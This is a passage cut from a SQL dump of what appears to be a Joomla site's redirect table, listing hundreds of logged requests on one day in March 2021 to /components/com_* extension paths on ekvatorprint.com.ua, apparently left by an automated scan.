13:56:31','0000-00-00 00:00:00',301),(19461,'https://ekvatorprint.com.ua/components/com_personal',NULL,'','',1,0,'2021-03-01 13:56:31','0000-00-00 00:00:00',301),(19462,'https://ekvatorprint.com.ua/components/com_lovefactory',NULL,'','',1,0,'2021-03-01 13:56:31','0000-00-00 00:00:00',301),(19463,'https://ekvatorprint.com.ua/components/com_musicgallery',NULL,'','',1,0,'2021-03-01 13:56:31','0000-00-00 00:00:00',301),(19464,'https://ekvatorprint.com.ua/components/com_calcbuilder',NULL,'','',1,0,'2021-03-01 13:56:31','0000-00-00 00:00:00',301),(19465,'https://ekvatorprint.com.ua/components/com_javoice',NULL,'','',1,0,'2021-03-01 13:56:32','0000-00-00 00:00:00',301),(19466,'https://ekvatorprint.com.ua/components/com_game',NULL,'','',1,0,'2021-03-01 13:56:32','0000-00-00 00:00:00',301),(19467,'https://ekvatorprint.com.ua/components/com_icagenda',NULL,'','',1,0,'2021-03-01 13:56:32','0000-00-00 00:00:00',301),(19468,'https://ekvatorprint.com.ua/components/com_securityimages',NULL,'','',1,0,'2021-03-01 13:56:32','0000-00-00 00:00:00',301),(19469,'https://ekvatorprint.com.ua/components/com_cwtags',NULL,'','',1,0,'2021-03-01 13:56:33','0000-00-00 00:00:00',301),(19470,'https://ekvatorprint.com.ua/components/com_golfcourseguid',NULL,'','',1,0,'2021-03-01 13:56:33','0000-00-00 00:00:00',301),(19471,'https://ekvatorprint.com.ua/components/com_recerca',NULL,'','',1,0,'2021-03-01 13:56:33','0000-00-00 00:00:00',301),(19472,'https://ekvatorprint.com.ua/components/com_tweetla',NULL,'','',1,0,'2021-03-01 13:56:33','0000-00-00 00:00:00',301),(19473,'https://ekvatorprint.com.ua/components/com_d-greinar',NULL,'','',1,0,'2021-03-01 13:56:34','0000-00-00 00:00:00',301),(19474,'https://ekvatorprint.com.ua/components/com_rssreader',NULL,'','',1,0,'2021-03-01 13:56:34','0000-00-00 00:00:00',301),(19475,'https://ekvatorprint.com.ua/components/com_quicknews',NULL,'','',1,0,'2021-03-01 13:56:34','0000-00-00 00:00:00',301),(19476,'https://ekvatorprint.com.ua/components/com_rsfiles',NULL,'','',1,0,'2021-03-01 13:56:34','0000-00-00 00:00:00',301),(19477,'https://ekvatorprint.com.ua/components/com_cpg',NULL,'','',1,0,'2021-03-01 13:56:35','0000-00-00 00:00:00',301),(19478,'https://ekvatorprint.com.ua/components/com_altauserpoints',NULL,'','',1,0,'2021-03-01 13:56:35','0000-00-00 00:00:00',301),(19479,'https://ekvatorprint.com.ua/components/com_comp',NULL,'','',1,0,'2021-03-01 13:56:35','0000-00-00 00:00:00',301),(19480,'https://ekvatorprint.com.ua/components/com_alfurqan',NULL,'','',1,0,'2021-03-01 13:56:35','0000-00-00 00:00:00',301),(19481,'https://ekvatorprint.com.ua/components/com_solution',NULL,'','',1,0,'2021-03-01 13:56:36','0000-00-00 00:00:00',301),(19482,'https://ekvatorprint.com.ua/components/com_bfquiztrial',NULL,'','',1,0,'2021-03-01 13:56:36','0000-00-00 00:00:00',301),(19483,'https://ekvatorprint.com.ua/components/com_qcontacts',NULL,'','',1,0,'2021-03-01 13:56:36','0000-00-00 00:00:00',301),(19484,'https://ekvatorprint.com.ua/components/com_artportal',NULL,'','',1,0,'2021-03-01 13:56:36','0000-00-00 00:00:00',301),(19485,'https://ekvatorprint.com.ua/components/com_education',NULL,'','',1,0,'2021-03-01 13:56:36','0000-00-00 00:00:00',301),(19486,'https://ekvatorprint.com.ua/components/com_joomnik',NULL,'','',1,0,'2021-03-01 13:56:37','0000-00-00 00:00:00',301),(19487,'https://ekvatorprint.com.ua/components/com_videos',NULL,'','',1,0,'2021-03-01 13:56:37','0000-00-00 00:00:00',301),(19488,'https://ekvatorprint.com.ua/components/com_gigcal',NULL,'','',1,0,'2021-03-01 13:56:37','0000-00-00 00:00:00',301),(19489,'https://ekvatorprint.com.ua/components/com_kissgallery',NULL,'','',1,0,'2021-03-01 13:56:38','0000-00-00 00:00:00',301),(19490,'https://ekvatorprint.com.ua/components/com_mambospgm',NULL,'','',1,0,'2021-03-01 13:56:38','0000-00-00 00:00:00',301),(19491,'https://ekvatorprint.com.ua/components/com_quran',NULL,'','',1,0,'2021-03-01 13:56:38','0000-00-00 00:00:00',301),(19492,'https://ekvatorprint.com.ua/components/com_joomlub',NULL,'','',1,0,'2021-03-01 13:56:38','0000-00-00 00:00:00',301),(19493,'https://ekvatorprint.com.ua/components/com_geocontent',NULL,'','',1,0,'2021-03-01 13:56:38','0000-00-00 00:00:00',301),(19494,'https://ekvatorprint.com.ua/components/com_joomlaquiz',NULL,'','',1,0,'2021-03-01 13:56:39','0000-00-00 00:00:00',301),(19495,'https://ekvatorprint.com.ua/components/com_sqlreport',NULL,'','',1,0,'2021-03-01 13:56:39','0000-00-00 00:00:00',301),(19496,'https://ekvatorprint.com.ua/components/com_rsgallery',NULL,'','',1,0,'2021-03-01 13:56:39','0000-00-00 00:00:00',301),(19497,'https://ekvatorprint.com.ua/components/com_dashboard',NULL,'','',1,0,'2021-03-01 13:56:39','0000-00-00 00:00:00',301),(19498,'https://ekvatorprint.com.ua/components/com_formmaker',NULL,'','',1,0,'2021-03-01 13:56:40','0000-00-00 00:00:00',301),(19499,'https://ekvatorprint.com.ua/components/com_na_mydocs',NULL,'','',1,0,'2021-03-01 13:56:40','0000-00-00 00:00:00',301),(19500,'https://ekvatorprint.com.ua/components/com_letterman',NULL,'','',1,0,'2021-03-01 13:56:40','0000-00-00 00:00:00',301),(19501,'https://ekvatorprint.com.ua/components/com_yelp',NULL,'','',1,0,'2021-03-01 13:56:40','0000-00-00 00:00:00',301),(19502,'https://ekvatorprint.com.ua/components/com_wmtgallery',NULL,'','',1,0,'2021-03-01 13:56:41','0000-00-00 00:00:00',301),(19503,'https://ekvatorprint.com.ua/components/com_joomla_flash_uploader',NULL,'','',1,0,'2021-03-01 13:56:41','0000-00-00 00:00:00',301),(19504,'https://ekvatorprint.com.ua/components/com_hotelguide',NULL,'','',1,0,'2021-03-01 13:56:41','0000-00-00 00:00:00',301),(19505,'https://ekvatorprint.com.ua/components/com_mp3',NULL,'','',1,0,'2021-03-01 13:56:41','0000-00-00 00:00:00',301),(19506,'https://ekvatorprint.com.ua/components/com_answers',NULL,'','',1,0,'2021-03-01 13:56:41','0000-00-00 00:00:00',301),(19507,'https://ekvatorprint.com.ua/components/com_rokcandy',NULL,'','',1,0,'2021-03-01 13:56:42','0000-00-00 00:00:00',301),(19508,'https://ekvatorprint.com.ua/components/com_cjlib',NULL,'','',1,0,'2021-03-01 13:56:42','0000-00-00 00:00:00',301),(19509,'https://ekvatorprint.com.ua/components/com_fundraiser',NULL,'','',1,0,'2021-03-01 13:56:42','0000-00-00 00:00:00',301),(19510,'https://ekvatorprint.com.ua/components/com_publication',NULL,'','',1,0,'2021-03-01 13:56:42','0000-00-00 00:00:00',301),(19511,'https://ekvatorprint.com.ua/components/com_annuaire',NULL,'','',1,0,'2021-03-01 13:56:43','0000-00-00 00:00:00',301),(19512,'https://ekvatorprint.com.ua/components/com_clanlist',NULL,'','',1,0,'2021-03-01 13:56:43','0000-00-00 00:00:00',301),(19513,'https://ekvatorprint.com.ua/components/com_jejob',NULL,'','',1,0,'2021-03-01 13:56:43','0000-00-00 00:00:00',301),(19514,'https://ekvatorprint.com.ua/components/com_phocadocumentation',NULL,'','',1,0,'2021-03-01 13:56:43','0000-00-00 00:00:00',301),(19515,'https://ekvatorprint.com.ua/components/com_estateagent',NULL,'','',1,0,'2021-03-01 13:56:43','0000-00-00 00:00:00',301),(19516,'https://ekvatorprint.com.ua/components/com_focalpoint',NULL,'','',1,0,'2021-03-01 13:56:44','0000-00-00 00:00:00',301),(19517,'https://ekvatorprint.com.ua/components/com_soccerbet',NULL,'','',1,0,'2021-03-01 13:56:44','0000-00-00 00:00:00',301),(19518,'https://ekvatorprint.com.ua/components/com_jemessenger',NULL,'','',1,0,'2021-03-01 13:56:44','0000-00-00 00:00:00',301),(19519,'https://ekvatorprint.com.ua/components/com_store',NULL,'','',1,0,'2021-03-01 13:56:44','0000-00-00 00:00:00',301),(19520,'https://ekvatorprint.com.ua/components/com_appointment',NULL,'','',1,0,'2021-03-01 13:56:45','0000-00-00 00:00:00',301),(19521,'https://ekvatorprint.com.ua/components/com_include',NULL,'','',1,0,'2021-03-01 13:56:45','0000-00-00 00:00:00',301),(19522,'https://ekvatorprint.com.ua/components/com_memorybook',NULL,'','',1,0,'2021-03-01 13:56:45','0000-00-00 00:00:00',301),(19523,'https://ekvatorprint.com.ua/components/com_emcomposer',NULL,'','',1,0,'2021-03-01 13:56:45','0000-00-00 00:00:00',301),(19524,'https://ekvatorprint.com.ua/components/com_commedia',NULL,'','',1,0,'2021-03-01 13:56:45','0000-00-00 00:00:00',301),(19525,'https://ekvatorprint.com.ua/components/com_flippingbook',NULL,'','',1,0,'2021-03-01 13:56:46','0000-00-00 00:00:00',301),(19526,'https://ekvatorprint.com.ua/components/com_socialpinboard',NULL,'','',1,0,'2021-03-01 13:56:46','0000-00-00 00:00:00',301),(19527,'https://ekvatorprint.com.ua/components/com_socialads',NULL,'','',1,0,'2021-03-01 13:56:46','0000-00-00 00:00:00',301),(19528,'https://ekvatorprint.com.ua/components/com_gmap',NULL,'','',1,0,'2021-03-01 13:56:46','0000-00-00 00:00:00',301),(19529,'https://ekvatorprint.com.ua/components/com_mv_restaurantmenumanager',NULL,'','',1,0,'2021-03-01 13:56:47','0000-00-00 00:00:00',301),(19530,'https://ekvatorprint.com.ua/components/com_esearch',NULL,'','',1,0,'2021-03-01 13:56:47','0000-00-00 00:00:00',301),(19531,'https://ekvatorprint.com.ua/components/com_powermail',NULL,'','',1,0,'2021-03-01 13:56:47','0000-00-00 00:00:00',301),(19532,'https://ekvatorprint.com.ua/components/com_people',NULL,'','',1,0,'2021-03-01 13:56:47','0000-00-00 00:00:00',301),(19533,'https://ekvatorprint.com.ua/components/com_jbuildozer',NULL,'','',1,0,'2021-03-01 13:56:48','0000-00-00 00:00:00',301),(19534,'https://ekvatorprint.com.ua/components/com_fireboard',NULL,'','',1,0,'2021-03-01 13:56:48','0000-00-00 00:00:00',301),(19535,'https://ekvatorprint.com.ua/components/com_matamko',NULL,'','',1,0,'2021-03-01 13:56:48','0000-00-00 00:00:00',301),(19536,'https://ekvatorprint.com.ua/components/com_mostwantedrealestate',NULL,'','',1,0,'2021-03-01 13:56:48','0000-00-00 00:00:00',301),(19537,'https://ekvatorprint.com.ua/components/com_timereturns',NULL,'','',1,0,'2021-03-01 13:56:49','0000-00-00 00:00:00',301),(19538,'https://ekvatorprint.com.ua/components/com_pccookbook',NULL,'','',1,0,'2021-03-01 13:56:49','0000-00-00 00:00:00',301),(19539,'https://ekvatorprint.com.ua/components/com_joomlaboard',NULL,'','',1,0,'2021-03-01 13:56:49','0000-00-00 00:00:00',301),(19540,'https://ekvatorprint.com.ua/components/com_jssupportticket',NULL,'','',1,0,'2021-03-01 13:56:49','0000-00-00 00:00:00',301),(19541,'https://ekvatorprint.com.ua/components/com_camp',NULL,'','',1,0,'2021-03-01 13:56:50','0000-00-00 00:00:00',301),(19542,'https://ekvatorprint.com.ua/components/com_guru',NULL,'','',1,0,'2021-03-01 13:56:50','0000-00-00 00:00:00',301),(19543,'https://ekvatorprint.com.ua/components/com_roommgmt',NULL,'','',1,0,'2021-03-01 13:56:50','0000-00-00 00:00:00',301),(19544,'https://ekvatorprint.com.ua/components/com_software',NULL,'','',1,0,'2021-03-01 13:56:50','0000-00-00 00:00:00',301),(19545,'https://ekvatorprint.com.ua/components/com_joomlalib',NULL,'','',1,0,'2021-03-01 13:56:51','0000-00-00 00:00:00',301),(19546,'https://ekvatorprint.com.ua/components/com_nfn',NULL,'','',1,0,'2021-03-01 13:56:51','0000-00-00 00:00:00',301),(19547,'https://ekvatorprint.com.ua/components/com_jsupport',NULL,'','',1,0,'2021-03-01 13:56:51','0000-00-00 00:00:00',301),(19548,'https://ekvatorprint.com.ua/components/com_orgchart',NULL,'','',1,0,'2021-03-01 13:56:51','0000-00-00 00:00:00',301),(19549,'https://ekvatorprint.com.ua/components/com_zhyandexmap',NULL,'','',1,0,'2021-03-01 13:56:52','0000-00-00 00:00:00',301),(19550,'https://ekvatorprint.com.ua/components/com_ajaxchat',NULL,'','',1,0,'2021-03-01 13:56:52','0000-00-00 00:00:00',301),(19551,'https://ekvatorprint.com.ua/components/com_rpx',NULL,'','',1,0,'2021-03-01 13:56:52','0000-00-00 00:00:00',301),(19552,'https://ekvatorprint.com.ua/components/com_goverment',NULL,'','',1,0,'2021-03-01 13:56:52','0000-00-00 00:00:00',301),(19553,'https://ekvatorprint.com.ua/components/com_doc',NULL,'','',1,0,'2021-03-01 13:56:52','0000-00-00 00:00:00',301),(19554,'https://ekvatorprint.com.ua/components/com_journal',NULL,'','',1,0,'2021-03-01 13:56:53','0000-00-00 00:00:00',301),(19555,'https://ekvatorprint.com.ua/components/com_agency',NULL,'','',1,0,'2021-03-01 13:56:53','0000-00-00 00:00:00',301),(19556,'https://ekvatorprint.com.ua/components/com_informations',NULL,'','',1,0,'2021-03-01 13:56:53','0000-00-00 00:00:00',301),(19557,'https://ekvatorprint.com.ua/components/com_remository_files',NULL,'','',1,0,'2021-03-01 13:56:53','0000-00-00 00:00:00',301),(19558,'https://ekvatorprint.com.ua/components/com_myblog',NULL,'','',1,0,'2021-03-01 13:56:53','0000-00-00 00:00:00',301),(19559,'https://ekvatorprint.com.ua/components/com_allcinevid',NULL,'','',1,0,'2021-03-01 13:56:54','0000-00-00 00:00:00',301),(19560,'https://ekvatorprint.com.ua/components/com_ztautolink',NULL,'','',1,0,'2021-03-01 13:56:54','0000-00-00 00:00:00',301),(19561,'https://ekvatorprint.com.ua/components/com_advertisementboard',NULL,'','',1,0,'2021-03-01 13:56:54','0000-00-00 00:00:00',301),(19562,'https://ekvatorprint.com.ua/components/com_mambatstaff',NULL,'','',1,0,'2021-03-01 13:56:54','0000-00-00 00:00:00',301),(19563,'https://ekvatorprint.com.ua/components/com_hospital',NULL,'','',1,0,'2021-03-01 13:56:55','0000-00-00 00:00:00',301),(19564,'https://ekvatorprint.com.ua/components/com_g2bridge',NULL,'','',1,0,'2021-03-01 13:56:55','0000-00-00 00:00:00',301),(19565,'https://ekvatorprint.com.ua/components/com_ranking',NULL,'','',1,0,'2021-03-01 13:56:55','0000-00-00 00:00:00',301),(19566,'https://ekvatorprint.com.ua/components/com_moofaq',NULL,'','',1,0,'2021-03-01 13:56:55','0000-00-00 00:00:00',301),(19567,'https://ekvatorprint.com.ua/components/com_trabalhe_conosco',NULL,'','',1,0,'2021-03-01 13:56:55','0000-00-00 00:00:00',301),(19568,'https://ekvatorprint.com.ua/components/com_jmarket',NULL,'','',1,0,'2021-03-01 13:56:56','0000-00-00 00:00:00',301),(19569,'https://ekvatorprint.com.ua/components/com_morfeoshow',NULL,'','',1,0,'2021-03-01 13:56:56','0000-00-00 00:00:00',301),(19570,'https://ekvatorprint.com.ua/components/com_joomdocs',NULL,'','',1,0,'2021-03-01 13:56:56','0000-00-00 00:00:00',301),(19571,'https://ekvatorprint.com.ua/components/com_ob',NULL,'','',1,0,'2021-03-01 13:56:56','0000-00-00 00:00:00',301),(19572,'https://ekvatorprint.com.ua/components/com_contactformmaker',NULL,'','',1,0,'2021-03-01 13:56:57','0000-00-00 00:00:00',301),(19573,'https://ekvatorprint.com.ua/components/com_price_alert',NULL,'','',1,0,'2021-03-01 13:56:57','0000-00-00 00:00:00',301),(19574,'https://ekvatorprint.com.ua/components/com_acprojects',NULL,'','',1,0,'2021-03-01 13:56:57','0000-00-00 00:00:00',301),(19575,'https://ekvatorprint.com.ua/components/com_aclassfb',NULL,'','',1,0,'2021-03-01 13:56:57','0000-00-00 00:00:00',301),(19576,'https://ekvatorprint.com.ua/components/com_spiderfaq',NULL,'','',1,0,'2021-03-01 13:56:57','0000-00-00 00:00:00',301),(19577,'https://ekvatorprint.com.ua/components/com_eventix',NULL,'','',1,0,'2021-03-01 13:56:58','0000-00-00 00:00:00',301),(19578,'https://ekvatorprint.com.ua/components/com_webtv',NULL,'','',1,0,'2021-03-01 13:56:58','0000-00-00 00:00:00',301),(19579,'https://ekvatorprint.com.ua/components/com_comments',NULL,'','',1,0,'2021-03-01 13:56:58','0000-00-00 00:00:00',301),(19580,'https://ekvatorprint.com.ua/components/com_philaform',NULL,'','',1,0,'2021-03-01 13:56:58','0000-00-00 00:00:00',301),(19581,'https://ekvatorprint.com.ua/components/com_galeria',NULL,'','',1,0,'2021-03-01 13:56:59','0000-00-00 00:00:00',301),(19582,'https://ekvatorprint.com.ua/components/com_cloner',NULL,'','',1,0,'2021-03-01 13:56:59','0000-00-00 00:00:00',301),(19583,'https://ekvatorprint.com.ua/components/com_jeauction',NULL,'','',1,0,'2021-03-01 13:56:59','0000-00-00 00:00:00',301),(19584,'https://ekvatorprint.com.ua/components/com_dtracker',NULL,'','',1,0,'2021-03-01 13:56:59','0000-00-00 00:00:00',301),(19585,'https://ekvatorprint.com.ua/components/com_saxumastro',NULL,'','',1,0,'2021-03-01 13:56:59','0000-00-00 00:00:00',301),(19586,'https://ekvatorprint.com.ua/components/com_expautospro',NULL,'','',1,0,'2021-03-01 13:57:00','0000-00-00 00:00:00',301),(19587,'https://ekvatorprint.com.ua/components/com_booklibrary_1',NULL,'','',1,0,'2021-03-01 13:57:00','0000-00-00 00:00:00',301),(19588,'https://ekvatorprint.com.ua/components/com_niceajaxpoll',NULL,'','',1,0,'2021-03-01 13:57:00','0000-00-00 00:00:00',301),(19589,'https://ekvatorprint.com.ua/components/com_jdrugstopics',NULL,'','',1,0,'2021-03-01 13:57:00','0000-00-00 00:00:00',301),(19590,'https://ekvatorprint.com.ua/components/com_jmovies',NULL,'','',1,0,'2021-03-01 13:57:01','0000-00-00 00:00:00',301),(19591,'https://ekvatorprint.com.ua/components/com_rsgallery2',NULL,'','',1,0,'2021-03-01 13:57:01','0000-00-00 00:00:00',301),(19592,'https://ekvatorprint.com.ua/components/com_galleria',NULL,'','',1,0,'2021-03-01 13:57:01','0000-00-00 00:00:00',301),(19593,'https://ekvatorprint.com.ua/components/com_org',NULL,'','',1,0,'2021-03-01 13:57:01','0000-00-00 00:00:00',301),(19594,'https://ekvatorprint.com.ua/components/com_ab_gallery',NULL,'','',1,0,'2021-03-01 13:57:02','0000-00-00 00:00:00',301),(19595,'https://ekvatorprint.com.ua/components/com_jr_tfb',NULL,'','',1,0,'2021-03-01 13:57:02','0000-00-00 00:00:00',301),(19596,'https://ekvatorprint.com.ua/components/com_joomgallery',NULL,'','',1,0,'2021-03-01 13:57:02','0000-00-00 00:00:00',301),(19597,'https://ekvatorprint.com.ua/components/com_thopper',NULL,'','',1,0,'2021-03-01 13:57:02','0000-00-00 00:00:00',301),(19598,'https://ekvatorprint.com.ua/components/com_guide',NULL,'','',1,0,'2021-03-01 13:57:02','0000-00-00 00:00:00',301),(19599,'https://ekvatorprint.com.ua/components/com_squadmanagement',NULL,'','',1,0,'2021-03-01 13:57:03','0000-00-00 00:00:00',301),(19600,'https://ekvatorprint.com.ua/components/com_magicdealsweb',NULL,'','',1,0,'2021-03-01 13:57:03','0000-00-00 00:00:00',301),(19601,'https://ekvatorprint.com.ua/components/com_juicy',NULL,'','',1,0,'2021-03-01 13:57:03','0000-00-00 00:00:00',301),(19602,'https://ekvatorprint.com.ua/components/com_rwcards',NULL,'','',1,0,'2021-03-01 13:57:03','0000-00-00 00:00:00',301),(19603,'https://ekvatorprint.com.ua/components/com_monthlyarchive',NULL,'','',1,0,'2021-03-01 13:57:04','0000-00-00 00:00:00',301),(19604,'https://ekvatorprint.com.ua/components/com_wisroyq',NULL,'','',1,0,'2021-03-01 13:57:04','0000-00-00 00:00:00',301),(19605,'https://ekvatorprint.com.ua/components/com_jcruisereservation',NULL,'','',1,0,'2021-03-01 13:57:04','0000-00-00 00:00:00',301),(19606,'https://ekvatorprint.com.ua/components/com_osproperty',NULL,'','',1,0,'2021-03-01 13:57:04','0000-00-00 00:00:00',301),(19607,'https://ekvatorprint.com.ua/components/com_cbcontact',NULL,'','',1,0,'2021-03-01 13:57:04','0000-00-00 00:00:00',301),(19608,'https://ekvatorprint.com.ua/components/com_oprykningspoint_mc',NULL,'','',1,0,'2021-03-01 13:57:05','0000-00-00 00:00:00',301),(19609,'https://ekvatorprint.com.ua/components/com_schools',NULL,'','',1,0,'2021-03-01 13:57:05','0000-00-00 00:00:00',301),(19610,'https://ekvatorprint.com.ua/components/com_jscalendar',NULL,'','',1,0,'2021-03-01 13:57:05','0000-00-00 00:00:00',301),(19611,'https://ekvatorprint.com.ua/components/com_community',NULL,'','',1,0,'2021-03-01 13:57:05','0000-00-00 00:00:00',301),(19612,'https://ekvatorprint.com.ua/components/com_aceftp',NULL,'','',1,0,'2021-03-01 13:57:06','0000-00-00 00:00:00',301),(19613,'https://ekvatorprint.com.ua/components/com_casino_blackjack',NULL,'','',1,0,'2021-03-01 13:57:06','0000-00-00 00:00:00',301),(19614,'https://ekvatorprint.com.ua/components/com_yanc',NULL,'','',1,0,'2021-03-01 13:57:06','0000-00-00 00:00:00',301),(19615,'https://ekvatorprint.com.ua/components/com_mmsblog',NULL,'','',1,0,'2021-03-01 13:57:06','0000-00-00 00:00:00',301),(19616,'https://ekvatorprint.com.ua/components/com_noticia',NULL,'','',1,0,'2021-03-01 13:57:06','0000-00-00 00:00:00',301),(19617,'https://ekvatorprint.com.ua/components/com_mycontent',NULL,'','',1,0,'2021-03-01 13:57:07','0000-00-00 00:00:00',301),(19618,'https://ekvatorprint.com.ua/components/com_user',NULL,'','',1,0,'2021-03-01 13:57:07','0000-00-00 00:00:00',301),(19619,'https://ekvatorprint.com.ua/components/com_kk',NULL,'','',1,0,'2021-03-01 13:57:07','0000-00-00 00:00:00',301),(19620,'https://ekvatorprint.com.ua/components/com_imagebrowser',NULL,'','',1,0,'2021-03-01 13:57:08','0000-00-00 00:00:00',301),(19621,'https://ekvatorprint.com.ua/components/com_biblioteca',NULL,'','',1,0,'2021-03-01 13:57:08','0000-00-00 00:00:00',301),(19622,'https://ekvatorprint.com.ua/components/com_jaextmanager',NULL,'','',1,0,'2021-03-01 13:57:08','0000-00-00 00:00:00',301),(19623,'https://ekvatorprint.com.ua/components/com_inter',NULL,'','',1,0,'2021-03-01 13:57:08','0000-00-00 00:00:00',301),(19624,'https://ekvatorprint.com.ua/components/com_archeryscores',NULL,'','',1,0,'2021-03-01 13:57:08','0000-00-00 00:00:00',301),(19625,'https://ekvatorprint.com.ua/components/com_kp',NULL,'','',1,0,'2021-03-01 13:57:09','0000-00-00 00:00:00',301),(19626,'https://ekvatorprint.com.ua/components/com_helpdeskpro',NULL,'','',1,0,'2021-03-01 13:57:09','0000-00-00 00:00:00',301),(19627,'https://ekvatorprint.com.ua/components/com_jajobboard',NULL,'','',1,0,'2021-03-01 13:57:09','0000-00-00 00:00:00',301),(19628,'https://ekvatorprint.com.ua/components/com_faq',NULL,'','',1,0,'2021-03-01 13:57:09','0000-00-00 00:00:00',301),(19629,'https://ekvatorprint.com.ua/components/com_expose_small_rc4',NULL,'','',1,0,'2021-03-01 13:57:10','0000-00-00 00:00:00',301),(19630,'https://ekvatorprint.com.ua/components/com_spec',NULL,'','',1,0,'2021-03-01 13:57:10','0000-00-00 00:00:00',301),(19631,'https://ekvatorprint.com.ua/components/com_facileforms',NULL,'','',1,0,'2021-03-01 13:57:10','0000-00-00 00:00:00',301),(19632,'https://ekvatorprint.com.ua/components/com_xevidmegahd',NULL,'','',1,0,'2021-03-01 13:57:10','0000-00-00 00:00:00',301),(19633,'https://ekvatorprint.com.ua/components/com_staticxt',NULL,'','',1,0,'2021-03-01 13:57:10','0000-00-00 00:00:00',301),(19634,'https://ekvatorprint.com.ua/components/com_redirect',NULL,'','',1,0,'2021-03-01 13:57:11','0000-00-00 00:00:00',301),(19635,'https://ekvatorprint.com.ua/components/com_allhotels',NULL,'','',1,0,'2021-03-01 13:57:11','0000-00-00 00:00:00',301),(19636,'https://ekvatorprint.com.ua/components/com_easygb',NULL,'','',1,0,'2021-03-01 13:57:11','0000-00-00 00:00:00',301),(19637,'https://ekvatorprint.com.ua/components/com_muscol',NULL,'','',1,0,'2021-03-01 13:57:11','0000-00-00 00:00:00',301),(19638,'https://ekvatorprint.com.ua/components/com_pc',NULL,'','',1,0,'2021-03-01 13:57:12','0000-00-00 00:00:00',301),(19639,'https://ekvatorprint.com.ua/components/com_multiroot',NULL,'','',1,0,'2021-03-01 13:57:12','0000-00-00 00:00:00',301),(19640,'https://ekvatorprint.com.ua/components/com_jevideogallery',NULL,'','',1,0,'2021-03-01 13:57:12','0000-00-00 00:00:00',301),(19641,'https://ekvatorprint.com.ua/components/com_yjcontactus',NULL,'','',1,0,'2021-03-01 13:57:12','0000-00-00 00:00:00',301),(19642,'https://ekvatorprint.com.ua/components/com_restaurante',NULL,'','',1,0,'2021-03-01 13:57:12','0000-00-00 00:00:00',301),(19643,'https://ekvatorprint.com.ua/components/com_jereverseauction',NULL,'','',1,0,'2021-03-01 13:57:13','0000-00-00 00:00:00',301),(19644,'https://ekvatorprint.com.ua/components/com_casino_videopoker',NULL,'','',1,0,'2021-03-01 13:57:13','0000-00-00 00:00:00',301),(19645,'https://ekvatorprint.com.ua/components/com_jek2storymultipleform',NULL,'','',1,0,'2021-03-01 13:57:13','0000-00-00 00:00:00',301),(19646,'https://ekvatorprint.com.ua/components/com_boss',NULL,'','',1,0,'2021-03-01 13:57:13','0000-00-00 00:00:00',301),(19647,'https://ekvatorprint.com.ua/components/com_dcnews',NULL,'','',1,0,'2021-03-01 13:57:14','0000-00-00 00:00:00',301),(19648,'https://ekvatorprint.com.ua/components/com_multibanners',NULL,'','',1,0,'2021-03-01 13:57:14','0000-00-00 00:00:00',301),(19649,'https://ekvatorprint.com.ua/components/com_filebase',NULL,'','',1,0,'2021-03-01 13:57:14','0000-00-00 00:00:00',301),(19650,'https://ekvatorprint.com.ua/components/com_jigsaw',NULL,'','',1,0,'2021-03-01 13:57:14','0000-00-00 00:00:00',301),(19651,'https://ekvatorprint.com.ua/components/com_simpleswfupload',NULL,'','',1,0,'2021-03-01 13:57:15','0000-00-00 00:00:00',301),(19652,'https://ekvatorprint.com.ua/components/com_joomradio',NULL,'','',1,0,'2021-03-01 13:57:15','0000-00-00 00:00:00',301),(19653,'https://ekvatorprint.com.ua/components/com_horses',NULL,'','',1,0,'2021-03-01 13:57:15','0000-00-00 00:00:00',301),(19654,'https://ekvatorprint.com.ua/components/com_listoffreeads',NULL,'','',1,0,'2021-03-01 13:57:15','0000-00-00 00:00:00',301),(19655,'https://ekvatorprint.com.ua/components/com_onispetitions',NULL,'','',1,0,'2021-03-01 13:57:16','0000-00-00 00:00:00',301),(19656,'https://ekvatorprint.com.ua/components/com_wire_immogest',NULL,'','',1,0,'2021-03-01 13:57:16','0000-00-00 00:00:00',301),(19657,'https://ekvatorprint.com.ua/components/com_portfolio',NULL,'','',1,0,'2021-03-01 13:57:16','0000-00-00 00:00:00',301),(19658,'https://ekvatorprint.com.ua/components/com_downloads',NULL,'','',1,0,'2021-03-01 13:57:16','0000-00-00 00:00:00',301),(19659,'https://ekvatorprint.com.ua/components/com_cinema',NULL,'','',1,0,'2021-03-01 13:57:17','0000-00-00 00:00:00',301),(19660,'https://ekvatorprint.com.ua/components/com_knowledgebase',NULL,'','',1,0,'2021-03-01 13:57:17','0000-00-00 00:00:00',301),(19661,'https://ekvatorprint.com.ua/components/com_crowdsource',NULL,'','',1,0,'2021-03-01 13:57:17','0000-00-00 00:00:00',301),(19662,'https://ekvatorprint.com.ua/components/com_a6mambohelpdesk',NULL,'','',1,0,'2021-03-01 13:57:17','0000-00-00 00:00:00',301),(19663,'https://ekvatorprint.com.ua/components/com_datsogallery',NULL,'','',1,0,'2021-03-01 13:57:18','0000-00-00 00:00:00',301),(19664,'https://ekvatorprint.com.ua/components/com_jimtawl',NULL,'','',1,0,'2021-03-01 13:57:18','0000-00-00 00:00:00',301),(19665,'https://ekvatorprint.com.ua/components/com_asortyment',NULL,'','',1,0,'2021-03-01 13:57:18','0000-00-00 00:00:00',301),(19666,'https://ekvatorprint.com.ua/components/com_digifolio',NULL,'','',1,0,'2021-03-01 13:57:18','0000-00-00 00:00:00',301),(19667,'https://ekvatorprint.com.ua/components/com_xmovie',NULL,'','',1,0,'2021-03-01 13:57:18','0000-00-00 00:00:00',301),(19668,'https://ekvatorprint.com.ua/components/com_nvitex',NULL,'','',1,0,'2021-03-01 13:57:19','0000-00-00 00:00:00',301),(19669,'https://ekvatorprint.com.ua/components/com_groups',NULL,'','',1,0,'2021-03-01 13:57:19','0000-00-00 00:00:00',301),(19670,'https://ekvatorprint.com.ua/components/com_jnewsletter',NULL,'','',1,0,'2021-03-01 13:57:19','0000-00-00 00:00:00',301),(19671,'https://ekvatorprint.com.ua/components/com_wmtrssreader',NULL,'','',1,0,'2021-03-01 13:57:19','0000-00-00 00:00:00',301),(19672,'https://ekvatorprint.com.ua/components/com_catalog',NULL,'','',1,0,'2021-03-01 13:57:19','0000-00-00 00:00:00',301),(19673,'https://ekvatorprint.com.ua/components/com_eventlist',NULL,'','',1,0,'2021-03-01 13:57:20','0000-00-00 00:00:00',301),(19674,'https://ekvatorprint.com.ua/components/com_jeemaarticlecollection',NULL,'','',1,0,'2021-03-01 13:57:20','0000-00-00 00:00:00',301),(19675,'https://ekvatorprint.com.ua/components/com_jem',NULL,'','',1,0,'2021-03-01 13:57:20','0000-00-00 00:00:00',301),(19676,'https://ekvatorprint.com.ua/components/com_kunena_google_map_no_geocode',NULL,'','',1,0,'2021-03-01 